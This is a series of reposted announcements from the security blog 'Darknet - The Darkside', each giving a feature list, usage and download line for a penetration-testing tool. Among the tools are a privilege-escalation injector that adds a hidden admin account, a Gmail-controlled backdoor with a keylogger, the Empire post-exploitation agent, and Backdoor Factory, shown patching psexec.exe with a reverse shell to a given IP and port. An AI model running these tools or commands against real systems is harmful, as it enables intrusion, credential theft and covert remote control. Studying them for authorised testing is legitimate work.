Frida is basically Greasemonkey for native apps, or, put in more technical terms, it’s a dynamic code instrumentation toolkit. It lets you inject snippets of JavaScript into native apps on Windows, Mac, Linux, iOS and Android. Frida also provides you with some simple tools built on top of the Frida API. These can be used as-is, tweaked to your needs, or serve as examples of how to use the API.

What?

Frida has a whole set of features but the main strengths it has are:

• Scriptable – Your own scripts get injected into black box processes to execute custom debugging logic. Hook any function, spy on crypto APIs or trace private application code, no source code needed!
• Stalking – Stealthy code tracing without relying on software or hardware breakpoints. Think DTrace in user-space, based on dynamic recompilation, like DynamoRIO and PIN.
• Portable – Works on Windows, Mac, Linux, iOS and Android. Grab a Python package from PyPI or use Frida through its .NET binding, browser plugin or C API.

Tools

There’s 4 main tools in Frida:

• frida-CLI – This is a REPL interface that aims to emulate a lot of the nice features of IPython (or Cycript), which tries to get you closer to your code for rapid prototyping and easy debugging.
• frida-ps – This is a command-line tool for listing processes, which is very useful when interacting with a remote system.
• frida-trace – This is is a tool for dynamically tracing function calls.
• frida-discover – This is a tool for discovering internal functions in a program, which can then be traced by using frida-trace.

Why?

Here are some use cases in which you could utilise Frida:

• There’s this new hot app everybody’s so excited about, but it’s only available for iOS and you’d love to interop with it. You realize it’s relying on encrypted network protocols and tools like Wireshark just won’t cut it. You pick up Frida and use it for API tracing.
• You’re building a desktop app which has been deployed at a customer’s site. There’s a problem but the built-in logging code just isn’t enough. You need to send your customer a custom build with lots of expensive logging code. Then you realize you could just use Frida and build an application- specific tool that will add all the diagnostics you need, and in just a few lines of Python. No need to send the customer a new custom build – you just send the tool which will work on many versions of your app.
• You’d like to build a Wireshark on steroids with support for sniffing encrypted protocols. It could even manipulate function calls to fake network conditions that would otherwise require you to set up a test lab.
• Your in-house app could use some black-box tests without polluting your production code with logic only required for exotic testing.

How?

Frida’s core is written in C and injects Google’s V8 engine into the target processes, where your JS gets executed with full access to memory, hooking functions and even calling native functions inside the process. There’s a bi-directional communication channel that is used to talk between your app (Python?) and the JS running inside the target process.

On top of this C core there are multiple language bindings, e.g. Python, Node.js, .NET, Qml, etc., and it is very easy to build additional bindings for other languages and environments.

You can download Frida here:

frida-7.0.9.zip

Or read more here.

The post Frida – Dynamic Code Instrumentation Toolkit appeared first on Darknet - The Darkside.

TempRacer is a Windows Privilege Escalation Tool written in C# designed to automate the process of injecting user creation commands into batch files with administrator level privileges.

The code itself is not using that many resources because it relies on callbacks from the OS. You can keep it running for the the whole day to try and catch the creation of an admin level batch file. It’s especially useful (and very successful) in environments where automated patching systems like BigFix are running. If you are able to trigger updates or new software installs you should give it a try.

Usage

You can use this tool to watch for *.bat file creation and try to inject “add user” to it, so that you can get local admin privs. Usage example:

tempracer.exe C:\ *.bat

Test it with:

echo "test123" > C:\temp\not-evil.bat

If successful it will inject the code to add the user “alex” with password “Hack123123” and add him to the local administrator group. It will also block the file for further changes, so the privilege escalation code stays inside.

You can also find some Windows Privilege Escalation Tools in: PowerSploit – A PowerShell Post-Exploitation Framework

And if you want to scan for privilege issues or misconfiguration, use this – windows-privesc-check – Windows Privilege Escalation Scanner

You can download tempracer here:

– TempRacer.exe
– tempracer-1.zip (Source)

Or read more here.

The post TempRacer – Windows Privilege Escalation Tool appeared first on Darknet - The Darkside.

Responder is an LLMNR, NBT-NS and MDNS poisoner. It will answer to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: NetBIOS Suffixes). By default, the tool will only answer to File Server Service request, which is for SMB.

The concept behind this is to target our answers, and be stealthier on the network. This also helps to ensure that we don’t break legitimate NBT-NS behavior. You can set the -r option via command line if you want to answer to the Workstation Service request name suffix.

Features

• Built-in SMB Auth server – Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP.
• Built-in MSSQL Auth server – Supports NTLMv1 and LMv2 hashes.
• Built-in HTTP Auth server – Supports NTLMv1, NTLMv2 hashes and Basic Authentication.
• Built-in HTTPS Auth server – As above (comes with dummy keys).
• Built-in LDAP Auth server – Supports NTLMSSP hashes and Simple Authentication (clear text authentication).
• Built-in FTP, POP3, IMAP, SMTP Auth servers – Supports collection of clear text credentials.
• Built-in DNS server – This server will answer type A queries, combine with ARP spoofing.
• Built-in WPAD Proxy Server – Will capture all HTTP requests from IE users with “Auto-detect settings” enabled.
• Browser Listener – This module allows you to find the PDC in stealth mode.
• Fingerprinting – Will fingerprint every host who issued an LLMNR/NBT-NS query.
• ICMP Redirect – For MITM on Windows XP/2003 and earlier Domain members.
• Rogue DHCP – Supports DHCP Inform Spoofing.
• Analyze mode – Allows you to see NBT-NS, BROWSER, LLMNR, DNS requests without poisoning.

Usage

Before starting take a look at Responder.conf and tweak it to your requirements.

./Responder.py [options]

--version             show program's version number and exit
  -h, --help            show this help message and exit
  -A, --analyze         Analyze mode. This option allows you to see NBT-NS,
                        BROWSER, LLMNR requests without responding.
  -I eth0, --interface=eth0
                        Network interface to use
  -b, --basic           Return a Basic HTTP authentication. Default: NTLM
  -r, --wredir          Enable answers for netbios wredir suffix queries.
                        Answering to wredir will likely break stuff on the
                        network. Default: False
  -d, --NBTNSdomain     Enable answers for netbios domain suffix queries.
                        Answering to domain suffixes will likely break stuff
                        on the network. Default: False
  -f, --fingerprint     This option allows you to fingerprint a host that
                        issued an NBT-NS or LLMNR query.
  -w, --wpad            Start the WPAD rogue proxy server. Default value is
                        False
  -u UPSTREAM_PROXY, --upstream-proxy=UPSTREAM_PROXY
                        Upstream HTTP proxy used by the rogue WPAD Proxy for
                        outgoing requests (format: host:port)
  -F, --ForceWpadAuth   Force NTLM/Basic authentication on wpad.dat file
                        retrieval. This may cause a login prompt. Default:
                        False
  --lm                  Force LM hashing downgrade for Windows XP/2003 and
                        earlier. Default: False
  -v, --verbose         Increase verbosity.

You can download Responder here:

Responder-v2.3.0.zip

Or read more here.

The post Responder – LLMNR, MDNS and NBT-NS Poisoner appeared first on Darknet - The Darkside.

Phishing Frenzy is an Open Source Ruby on Rails e-mail phishing framework designed to help penetration testers manage multiple, complex phishing campaigns. The goal of the project is to streamline the phishing process while still providing clients the best realistic phishing campaign possible. This goal is obtainable through campaign management, template reuse, statistical generation, and other features the Frenzy has to offer.

Leveraging the Twitter Bootstrap CSS library Phishing Frenzy is presented with an elegant front end that feels comfortable. Manage your phishing campaign with ease while looking good.

There are of course other frameworks and tools available too such as:

– Gophish – Open-Source Phishing Framework
– sptoolkit Rebirth – Simple Phishing Toolkit
– spt v0.6.0 – Simple Phishing Toolkit Available For Download

How It Works

Email Phishing in it’s simplest form consists of three (3) primary components.

• Sending Emails
• Hosting Websites
• Tracking Analytics

There obviously are more complex forms of email phishing that include additional components, but for the sake of our conversation we are going to break it up to this simple structure.

Features

• Website Cloning
• E-mail Harvesting
• Credential Harvesting
• UID tracking for users
• Reporting and Analytics
• Action Mailer
• Dynamic E-mails
• Preview E-mails
• Sharing Templates
• DataTables
• Export XML
• PDF Reports

You can download Phishing Frenzy by cloning the Github repo:

sudo git clone https://github.com/pentestgeek/phishing-frenzy.git /var/www/phishing-frenzy

Or read more here.

The post Phishing Frenzy – E-mail Phishing Framework appeared first on Darknet - The Darkside.

DNSRecon is a Python based DNS enumeration script designed to help you audit your DNS security and configuration as part of information gathering stage of a pen-test. DNS reconnaissance is an important step when mapping out domain resources, sub-domains, e-mail servers and so on and can often lead to you finding an old DNS entry pointing to an unmaintained, insecure server.

It’s also considered passive information gathering, as it’s a way to gather a map of company/target resources without alerting IDS/IPS systems by doing active probes/scans.

Features

DNSRecon provides the ability to perform:

• Check all NS Records for Zone Transfers
• Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT)
• Perform common SRV Record Enumeration. Top Level Domain (TLD) Expansion
• Check for Wildcard Resolution
• Brute Force subdomain and host A and AAAA records given a domain and a wordlist
• Perform a PTR Record lookup for a given IP Range or CIDR
• Check a DNS Server Cached records for A, AAAA and CNAME Records provided a list of host records in a text file to check
• Enumerate Common mDNS records in the Local Network Enumerate Hosts and Subdomains using Google

Usage

root@box:~# dnsrecon -h
Usage: dnsrecon.py

Options:
-h, --help Show this help message and exit
-d, --domain Domain to Target for enumeration.
-r, --range IP Range for reverse look-up brute force in formats (first-last)
or in (range/bitmask).
-n, --name_server Domain server to use, if none is given the SOA of the
target will be used
-D, --dictionary Dictionary file of sub-domain and hostnames to use for
brute force.
-f Filter out of Brute Force Domain lookup records that resolve to
the wildcard defined IP Address when saving records.
-t, --type Specify the type of enumeration to perform:
std To Enumerate general record types, enumerates.
SOA, NS, A, AAAA, MX and SRV if AXRF on the
NS Servers fail.

rvl To Reverse Look Up a given CIDR IP range.

brt To Brute force Domains and Hosts using a given
dictionary.

srv To Enumerate common SRV Records for a given

domain.

axfr Test all NS Servers in a domain for misconfigured
zone transfers.

goo Perform Google search for sub-domains and hosts.

snoop To Perform a Cache Snooping against all NS
servers for a given domain, testing all with
file containing the domains, file given with -D
option.

tld Will remove the TLD of given domain and test against
all TLD's registered in IANA

zonewalk Will perform a DNSSEC Zone Walk using NSEC Records.

-a Perform AXFR with the standard enumeration.
-s Perform Reverse Look-up of ipv4 ranges in the SPF Record of the
targeted domain with the standard enumeration.
-g Perform Google enumeration with the standard enumeration.
-w Do deep whois record analysis and reverse look-up of IP
ranges found thru whois when doing standard query.
-z Performs a DNSSEC Zone Walk with the standard enumeration.
--threads Number of threads to use in Range Reverse Look-up, Forward
Look-up Brute force and SRV Record Enumeration
--lifetime Time to wait for a server to response to a query.
--db SQLite 3 file to save found records.
--xml XML File to save found records.
--iw Continua bruteforcing a domain even if a wildcard record resolution is discovered.
-c, --csv Comma separated value file.
-v Show attempts in the bruteforce modes.

You can download DNSRecon here:

dnsrecon-v0.8.9.zip

Or read more here.

The post DNSRecon – DNS Enumeration Script appeared first on Darknet - The Darkside.

INURLBR is a PHP based advanced search engine tool for security professionals, it supports 24 search engines and 6 deep web or special options. Very useful for the information gathering phase of a penetration test or vulnerability assessment.

This tool functions in many ways enabling you to harness the power of what’s already indexed by the search engines and analyse your target for potential exploits, capture E-mails and URLs with internal custom validation for each target/URL found.

Also supports external commands for exploitation, so if your scan/search finds a potential validated SQL Injection vulnerability, you could have INURLBR directly launch sqlmap or your tool of choice.

Features

• Generate IP ranges or random_ip and analyse the targets.
• Customization of HTTP-HEADER, USER-AGET, URL-REFERENCE.
• Execute external commands to exploit certain targets.
• Generate random dorks or set dorks file.
• Option to set proxy manually or from a file list.
• Supports both SOCKS and HTTP proxies
• Set time for proxy change when using random.
• Supports TOR to randomise IP.
• Debug processed URLs & HTTP requests.
• Can send vulnerable URLs to an IRC chat room.
• Support for GET / POST => SQLI, LFI, LFD injection exploits.
• Filter and validate based on regexp.
• Extraction of e-mail addresses and URLs.
• Validation using HTTP response codes.
• Search pages based on strings file.
• Exploits commands manager.
• Paging limiter on search engines.
• Beep sound when a vulnerability is found.
• Use text file as a data source for URLs to test.
• Find personalized strings in return values of the tests.
• Checks and validates for Shellshock.
• File validation for the WordPress config file – wp-config.php.
• Can execute a sub-process for validation.
• Validate syntax errors for databases and programming.
• Data encryption as native parameter.
• Random Google host.
• Scan port.

Search Engines/Methods Supported

• Google / (CSE) generic random / API
• Bing
• Yahoo! BR
• Ask
• HAO123 Br
• Google (API)
• Lycos
• UOL Br
• Yahoo! US
• Sapo
• Dmoz
• Gigablast
• Never
• Baidu BR
• Andex
• Zoo
• Hotbot
• Zhongsou
• Hksearch
• Ezilion
• Sogou
• DuckDuckGo
• Boorow
• Google (CSE) generic random

Special

• Tor Find
• Elephant
• Torsearch
• Wikileaks
• OTN
• Shodan

Errors Checked For

• Java Infinitydb
• LFI
• Zimbra mail
• Zend framework
• MariaDB
• MySQL
• Jbossweb
• Microsoft
• ODBC
• PostgreSQL
• PHP
• WordPress
• Web Shell
• JDBC
• ASP
• Oracle
• DB2
• CFM
• LUA

You can download INURLBR by cloning the Github repo:

git clone https://github.com/googleinurl/SCANNER-INURLBR.git inurlbr

Or read more here.

The post INURLBR – Advanced Search Engine Tool appeared first on Darknet - The Darkside.

Recon-ng is a full-featured Web Reconnaissance Framework written in Python. Complete with independent modules, database interaction, interactive help, and command completion – Recon-ng provides a powerful environment in which open source web-based reconnaissance can be conducted quickly and thoroughly.

Recon-ng has a look and feel and even command flow similar to the Metasploit Framework, reducing the learning curve for leveraging the framework. It is of course quite different though, Recon-ng is not designed to compete with existing frameworks, as it is designed exclusively for web-based open source reconnaissance.

If you want to exploit, use the Metasploit Framework. If you want to social engineer, use the Social-Engineer Toolkit. If you want to conduct passive reconnaissance, use Recon-ng!

An example on active reconnaissance would be Skipfish by the Google Security Team.

Recon-ng is a completely modular framework and makes it easy for even the newest of Python developers to contribute. Each module is a subclass of the “module” class. The “module” class is a customized “cmd” interpreter equipped with built-in functionality that provides simple interfaces to common tasks such as standardizing output, interacting with the database, making web requests, and managing API keys. Therefore, all the hard work has been done. Building modules is simple and takes little more than a few minutes.

Modules

Recon-ng comes with ~80 recon moduloes, 2 discovery modules, 2 exploitation modules, 7 reporting modules and 2 import modules.

• cache_snoop – DNS Cache Snooper
• interesting_files – Interesting File Finder
• command_injector – Remote Command Injection Shell Interface
• xpath_bruter – Xpath Injection Brute Forcer
• csv_file – Advanced CSV File Importer
• list – List File Importer
• point_usage – Jigsaw – Point Usage Statistics Fetcher
• purchase_contact – Jigsaw – Single Contact Retriever
• search_contacts – Jigsaw Contact Enumerator
• jigsaw_auth – Jigsaw Authenticated Contact Enumerator
• linkedin_auth – LinkedIn Authenticated Contact Enumerator
• github_miner – Github Resource Miner
• whois_miner – Whois Data Miner
• bing_linkedin – Bing Linkedin Profile Harvester
• email_validator – SalesMaple Email Validator
• mailtester – MailTester Email Validator
• mangle – Contact Name Mangler
• unmangle – Contact Name Unmangler
• hibp_breach – Have I been pwned? Breach Search
• hibp_paste – Have I been pwned? Paste Search
• pwnedlist – PwnedList Validator
• migrate_contacts – Contacts to Domains Data Migrator
• facebook_directory – Facebook Directory Crawler
• fullcontact – FullContact Contact Enumerator
• adobe – Adobe Hash Cracker
• bozocrack – PyBozoCrack Hash Lookup
• hashes_org – Hashes.org Hash Lookup
• leakdb – leakdb Hash Lookup
• metacrawler – Meta Data Extractor
• pgp_search – PGP Key Owner Lookup
• salesmaple – SalesMaple Contact Harvester
• whois_pocs – Whois POC Harvester
• account_creds – PwnedList – Account Credentials Fetcher
• api_usage – PwnedList – API Usage Statistics Fetcher
• domain_creds – PwnedList – Pwned Domain Credentials Fetcher
• domain_ispwned – PwnedList – Pwned Domain Statistics Fetcher
• leak_lookup – PwnedList – Leak Details Fetcher
• leaks_dump – PwnedList – Leak Details Fetcher
• brute_suffix – DNS Public Suffix Brute Forcer
• baidu_site – Baidu Hostname Enumerator
• bing_domain_api – Bing API Hostname Enumerator
• bing_domain_web – Bing Hostname Enumerator
• brute_hosts – DNS Hostname Brute Forcer
• builtwith – BuiltWith Enumerator
• google_site_api – Google CSE Hostname Enumerator
• google_site_web – Google Hostname Enumerator
• netcraft – Netcraft Hostname Enumerator
• shodan_hostname – Shodan Hostname Enumerator
• ssl_san – SSL SAN Lookup
• vpnhunter – VPNHunter Lookup
• yahoo_domain – Yahoo Hostname Enumerator
• zone_transfer – DNS Zone File Harvester
• ghdb – Google Hacking Database
• punkspider – PunkSPIDER Vulnerabilty Finder
• xssed – XSSed Domain Lookup
• xssposed – XSSposed Domain Lookup
• migrate_hosts – Hosts to Domains Data Migrator
• bing_ip – Bing API IP Neighbor Enumerator
• freegeoip – FreeGeoIP
• ip_neighbor – My-IP-Neighbors.com Lookup
• ipinfodb – IPInfoDB GeoIP
• resolve – Hostname Resolver
• reverse_resolve – Reverse Resolver
• ssltools – SSLTools.com Host Name Lookups
• geocode – Address Geocoder
• reverse_geocode – Reverse Geocoder
• flickr – Flickr Geolocation Search
• instagram – Instagram Geolocation Search
• picasa – Picasa Geolocation Search
• shodan – Shodan Geolocation Search
• twitter – Twitter Geolocation Search
• whois_orgs – Whois Company Harvester
• reverse_resolve – Reverse Resolver
• shodan_net – Shodan Network Enumerator
• census_2012 – Internet Census 2012 Lookup
• sonar_cio – Project Sonar Lookup
• migrate_ports – Ports to Hosts Data Migrator
• dev_diver – Dev Diver Repository Activity Examiner
• linkedin – Linkedin Contact Crawler
• linkedin_crawl – Linkedin Profile Crawler
• namechk – NameChk.com Username Validator
• profiler – OSINT HUMINT Profile Collector
• twitter – Twitter Handles
• github_repos – Github Code Enumerator
• gists_search – Github Gist Searcher
• github_dorks – Github Dork Analyzer
• csv – CSV File Creator
• html – HTML Report Generator
• json – JSON Report Generator
• list – List Creator
• pushpin – PushPin Report Generator
• xlsx – XLSX File Creator
• xml – XML Report Generator

Dependencies

All 3rd party libraries/packages should be installed prior to use. The framework checks for the presence of the following dependencies at runtime and disables the modules affected by missing dependencies.

• dnspython – http://www.dnspython.org/
• dicttoxml – https://github.com/quandyfactory/dicttoxml/
• jsonrpclib – https://github.com/joshmarshall/jsonrpclib/
• lxml – http://lxml.de/
• mechanize – http://wwwsearch.sourceforge.net/mechanize/
• slowaes – https://code.google.com/p/slowaes/
• XlsxWriter – https://github.com/jmcnamara/XlsxWriter/

You can download Recon-ng here:

git clone https://LaNMaSteR53@bitbucket.org/LaNMaSteR53/recon-ng.git

To install:

Change into the Recon-ng directory.

cd recon-ng

Install dependencies.

pip install -r REQUIREMENTS

Or read more here.

The post Recon-ng – Web Reconnaissance Framework appeared first on Darknet - The Darkside.

Empire is a pure PowerShell post-exploitation agent built on cryptographically secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

It has a LOT of modules (90+) and is currently in the midst of implementing a RESTful API which will be great.

Module Categories

Currently Empire has the following categories for modules:

• Code Execution – Ways to run more code
• Collection – Post exploitation data collection
• Credentials – Collect and use creds
• Exfiltration – Identify egress channels
• Lateral Movement – Move around the network
• Management – Host management and auxilary
• Persistence – Survive reboots
• Privesc – Privilege escalation capabilities
• Recon – Test further entry points (HTTP Basic Auth etc)
• Situational Awareness – Network awareness
• Trollsploit – For the lulz

Why PowerShell?

PowerShell offers a multitude of offensive advantages, including:

• Full .NET access
• Application whitelisting
• Direct access to the Win32 API
• Ability to assemble malicious binaries in memor
• Default installation on Windows 7+.

Offensive PowerShell had a watershed year in 2014, but despite the multitude of useful projects, many pen-testers still struggle to integrate PowerShell into their engagements in a secure manner.

How it works

Empire has a few components which you can chain together, similar to something like Metasploits.

It has:

Listeners – Think of this like a metasploit handler, this will catch your session.
Stagers – This is your payload, this is what you will execute on your target system.
Agents – This is how you interact with the target system, you can gather stats & info or run shell commands.

It also had fairly robust logging built in.

You can download Empire here:

Empire-1.5.zip

Or read more here.

The post Empire – PowerShell Post-Exploitation Agent appeared first on Darknet - The Darkside.

WAFW00F is a Python tool to help you fingerprint and identify Web Application Firewall (WAF) products. It is an active reconnaissance tool as it actually connects to the web server, but it starts out with a normal HTTP response and escalates as necessary.

You can override or include your own headers, it has SOCKS and HTTP proxy support and detects a whole bunch of WAF products from hosted solutions like CloudFlare and Incapsula to server side solutions like ModSecurity.

How does it work?

To do its magic, WAFW00F does the following:

• Sends a normal HTTP request and analyses the response; this identifies a number of WAF solutions
• If that is not successful, it sends a number of (potentially malicious) HTTP requests and uses simple logic to deduce which WAF it is
• If that is also not successful, it analyses the responses previously returned and uses another simple algorithm to guess if a WAF or security solution is actively responding to our attacks

What does it detect?

It detects a number of WAFs. To view which WAFs it is able to detect run WAFW00F with the -l option. At the time of writing the output is as follows:

• Anquanbao
• Juniper WebApp Secure
• IBM Web Application Security
• Cisco ACE XML Gateway
• F5 BIG-IP APM
• 360WangZhanBao
• ModSecurity (OWASP CRS)
• PowerCDN
• Safedog
• F5 FirePass
• DenyALL WAF
• Trustwave ModSecurity
• CloudFlare
• Imperva SecureSphere
• Incapsula WAF
• Citrix NetScaler
• F5 BIG-IP LTM
• Art of Defence HyperGuard
• Aqtronix WebKnight
• Teros WAF
• eEye Digital Security SecureIIS
• BinarySec
• IBM DataPower
• Microsoft ISA Server
• NetContinuum
• NSFocus
• ChinaCache-CDN
• West263CDN
• InfoGuard Airlock
• Barracuda Application Firewall
• F5 BIG-IP ASM
• Profense
• Mission Control Application Shield
• Microsoft URLScan
• Applicure dotDefender
• USP Secure Entry Server
• F5 Trafficshield

You can download here:

wafw00f-v0.9.4.zip

Or read more here.

The post WAFW00F – Fingerprint & Identify Web Application Firewall (WAF) Products appeared first on Darknet - The Darkside.

SPF (SpeedPhish Framework) is a an e-mail phishing toolkit written in Python designed to allow for quick recon and deployment of simple social engineering phishing exercises.

There are also other popular Phishing tools are frameworks such as:

– Phishing Frenzy – E-mail Phishing Framework
– Gophish – Open-Source Phishing Framework
– sptoolkit Rebirth – Simple Phishing Toolkit

Usage

usage: spf.py [-h] [-f <list.txt>] [-C <config.txt>] [--all] [--test] [-e]
              [-g] [-s] [--simulate] [-w] [-W] [-d <domain>]
              [-c <company's name>] [--ip <IP address>] [-v] [-y]

optional arguments:
  -h, --help           show this help message and exit
  -d <domain>          domain name to phish
  -c <company's name>  name of company to phish
  --ip <IP address>    IP of webserver defaults to [192.168.1.124]
  -v, --verbosity      increase output verbosity

input files:
  -f <list.txt>        file containing list of email addresses
  -C <config.txt>      config file

enable flags:
  --all                enable ALL flags... same as (-e -g -s -w)
  --test               enable all flags EXCEPT sending of emails... same as
                       (-e -g --simulate -w -y -v -v)
  -e                   enable external tool utilization
  -g                   enable automated gathering of email targets
  -s                   enable automated sending of phishing emails to targets
  --simulate           simulate the sending of phishing emails to targets
  -w                   enable generation of phishing web sites
  -W                   leave web server running after termination of spf.py

misc:
  -y                   automatically answer yes to all questions

Requirements

• dnspython
• twisted
• PhantomJS

You can download SPF here:

SPF-master.zip

Or read more here.

The post SPF (SpeedPhish Framework) – E-mail Phishing Toolkit appeared first on Darknet - The Darkside.

Gdog is a stealthy Python Windows backdoor that uses Gmail as a command and control server, it’s inspired by Gcat and pushes a little beyond a proof of concept with way more features.

And don’t forget, Gcat also inspired Twittor – Backdoor Using Twitter For Command & Control.

Features

• Encrypted transportation messages (AES) + SHA256 hashing
• Generate computer unique id using system information/characteristics (SHA256 hash)
• Job IDs are random SHA256 hashes
• Retrieve system information
• Retrieve Geolocation information (City, Country, lat, long, etc..)
• Retrieve running processes/system services/system users/devices (hardware)
• Retrieve list of clients
• Execute system command
• Download files from client
• Upload files to client
• Execute shellcode
• Take screenshot
• Lock client’s screen
• Keylogger
• Lock remote computer’s screen
• Shutdown/Restart remote computer
• Log off current user
• Download file from the WEB
• Visit website
• Show message box to user

Usage

__
           ____ _____/ /___  ____ _
          / __ `/ __  / __ \/ __ `/
         / /_/ / /_/ / /_/ / /_/ /
         \__, /\__,_/\____/\__, /
        /____/            /____/

optional arguments:
  -h, --help            show this help message and exit
  -v, --version         show program's version number and exit
  -id ID                Client to target
  -jobid JOBID          Job id to retrieve

  -list                 List available clients
  -info                 Retrieve info on specified client

Commands:
  Commands to execute on an implant

  -cmd CMD              Execute a system command
  -visitwebsite URL     Visit website
  -message TEXT TITLE   Show message to user
  -tasks                Retrieve running processes
  -services             Retrieve system services
  -users                Retrieve system users
  -devices              Retrieve devices(Hardware)
  -download PATH        Download a file from a clients system
  -download-fromurl URL
                        Download a file from the web
  -upload SRC DST       Upload a file to the clients system
  -exec-shellcode FILE  Execute supplied shellcode on a client
  -screenshot           Take a screenshot
  -lock-screen          Lock the clients screen
  -shutdown             Shutdown remote computer
  -restart              Restart remote computer
  -logoff               Log off current remote user
  -force-checkin        Force a check in
  -start-keylogger      Start keylogger
  -stop-keylogger       Stop keylogger

Requirements & Setup

For this to work you need:

• Python 2.x
• PyCrypto module
• WMI module
• Enum34 module
• Netifaces module

And:

• A Gmail account (Use a dedicated account! Do not use your personal one!)
• Turn on “Allow less secure apps” under the security settings of the account.
• You may also have to enable IMAP in the account settings.

Download/Install

git clone https://github.com/maldevel/gdog
pip install -r requirements.txt --user

You can download Gdog here:

gdog-v1.0.1.zip

Or read more here.

The post Gdog – Python Windows Backdoor With Gmail Command & Control appeared first on Darknet - The Darkside.

The Backdoor Factory or BDF is a tool which enables you to patch binaries with shellcode and continue normal execution exactly as the executable binary would have in its’ pre-patched state.

Some executables have built in protection, as such this tool will not work on all binaries. It is advisable that you test target binaries before deploying them to clients or using them in exercises.

There’s a couple of somewhat related tools you can also check out:

– peinjector – MITM PE File Injector
– PEiD – Detect PE Packers, Cryptors & Compilers

Features

Overall

The user can:

• Provide custom shellcode.
• Patch a directory of executables/dlls.
• Select x32 or x64 binaries to patch only.
• Include BDF is other python projects see pebin.py and elfbin.py

PE Files

• Can find all codecaves in an EXE/DLL.
• By default, clears the pointer to the PE certificate table, thereby unsigning a binary.
• Can inject shellcode into code caves or into a new section.
• Can find if a PE binary needs to run with elevated privileges.
• When selecting code caves, you can use the following commands:
  • Jump (j), for code cave jumping
  • Single (s), for patching all your shellcode into one cave
  • Append (a), for creating a code cave
  • Ignore (i or q), nevermind, ignore this binary
• Can ignore DLLs
• Import Table Patching
• AutoPatching (-m automtic)
• Onionduke (-m onionduke)

ELF Files

Extends 1000 bytes (in bytes) to the TEXT SEGMENT and injects shellcode into that section of code.

Mach-O Files

Pre-Text Section patching and signature removal

Usage

./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp 

[*] In the backdoor module
[*] Checking if binary is supported
[*] Gathering file info
[*] Reading win32 entry instructions
[*] Looking for and setting selected shellcode
[*] Creating win32 resume execution stub
[*] Looking for caves that will fit the minimum shellcode length of 402
[*] All caves lengths:  (402,)
############################################################
The following caves can be used to inject code and possibly
continue execution.
**Don't like what you see? Use jump, single, append, or ignore.**
############################################################
[*] Cave 1 length as int: 402
[*] Available caves:
1. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e4d5 End: 0x2e6d0; Cave Size: 507
2. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e6e9 End: 0x2e8d5; Cave Size: 492
3. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2e8e3 End: 0x2ead8; Cave Size: 501
4. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eaf1 End: 0x2ecdd; Cave Size: 492
5. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2ece7 End: 0x2eee0; Cave Size: 505
6. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2eef3 End: 0x2f0e5; Cave Size: 498
7. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f0fb End: 0x2f2ea; Cave Size: 495
8. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f2ff End: 0x2f4f8; Cave Size: 505
9. Section Name: .data; Section Begin: 0x2e400 End: 0x30600; Cave begin: 0x2f571 End: 0x2f7a0; Cave Size: 559
10. Section Name: .rsrc; Section Begin: 0x30600 End: 0x5f200; Cave begin: 0x5b239 End: 0x5b468; Cave Size: 559
**************************************************
[!] Enter your selection: 5
Using selection: 5
[*] Changing Section Flags
[*] Patching initial entry instructions
[*] Creating win32 resume execution stub
[*] Overwriting certificate table pointer
[*] psexec.exe backdooring complete
File psexec.exe is in the 'backdoored' directory

You can download BDF here:

the-backdoor-factory-3.3.1.zip

Or read more here.

The post The Backdoor Factory (BDF) – Patch Binaries With Shellcode appeared first on Darknet - The Darkside.

SubBrute is a community driven project with the goal of creating the fastest, and most accurate subdomain brute-forcing tool. Some of the magic behind SubBrute is that it uses open resolvers as a kind of proxy to circumvent DNS rate-limiting. This design also provides a layer of anonymity, as SubBrute does not send traffic directly to the target’s name servers.

There are various other options with similar capabilities, such as:

– InstaRecon – Automated Subdomain Discovery Tool
– dnsmap 0.22 Released – Subdomain Bruteforcing Tool
– DNSenum – Domain Information Gathering Tool
– Complemento v0.6 – ReverseRaider Subdomain Scanner
– DNSRecon – DNS Enumeration Script
– Recon-ng – Web Reconnaissance Framework

Features

• Fast, multi-threaded and comes with more than 2000 high quality nameservers in resolver.txt
• Nameservers are verified when they are needed. A seperate thread is responsible creating a feed of nameservers, and corresponding wildcard blacklist.
• SubBrute is now a DNS spider that recursively crawls enumerated DNS records. This feature boosted *.google.com from 123 to 162 subdomains.
• –type enumerate an arbitrary record type (AAAA, CNAME, SOA, TXT, MX…)
• -s can now read subdomains from result files.
• The subdomains enumerated from previous scans can now be used as input to enumerate other DNS records.

Usage

Usage: subbrute.exe [options] target

Options:
  -h, --help            show this help message and exit
  -s SUBS, --subs=SUBS  (optional) list of subdomains,  default = 'names.txt'
  -r RESOLVERS, --resolvers=RESOLVERS
                        (optional) A list of DNS resolvers, if this list is
                        empty it will OS's internal resolver default =
                        'resolvers.txt'
  -f FILTER, --filter_subs=FILTER
                        (optional) A file containing unorganized domain names
                        which will be filtered into a list of subdomains
                        sorted by frequency.  This was used to build
                        names.txt.
  -t TARGETS, --targets_file=TARGETS
                        (optional) A file containing a newline delimited list
                        of domains to brute force.
  -o OUTPUT, --output=OUTPUT
                        (optional) Output to file
  -a, -A                (optional) Print all IPv4 addresses for sub domains
                        (default = off).
  --type=TYPE           (optional) Print all reponses for an arbitrary DNS
                        record type (CNAME, AAAA, TXT, SOA, MX...)
  -c PROCESS_COUNT, --process_count=PROCESS_COUNT
                        (optional) Number of lookup theads to run. default =
                        16
  -v, --verbose         (optional) Print debug information.

You can download SubBrute here:

– subbrute-source-77.zip
– windows-subbrute.zip

Or read more here.

The post SubBrute – Subdomain Brute-forcing Tool appeared first on Darknet - The Darkside.

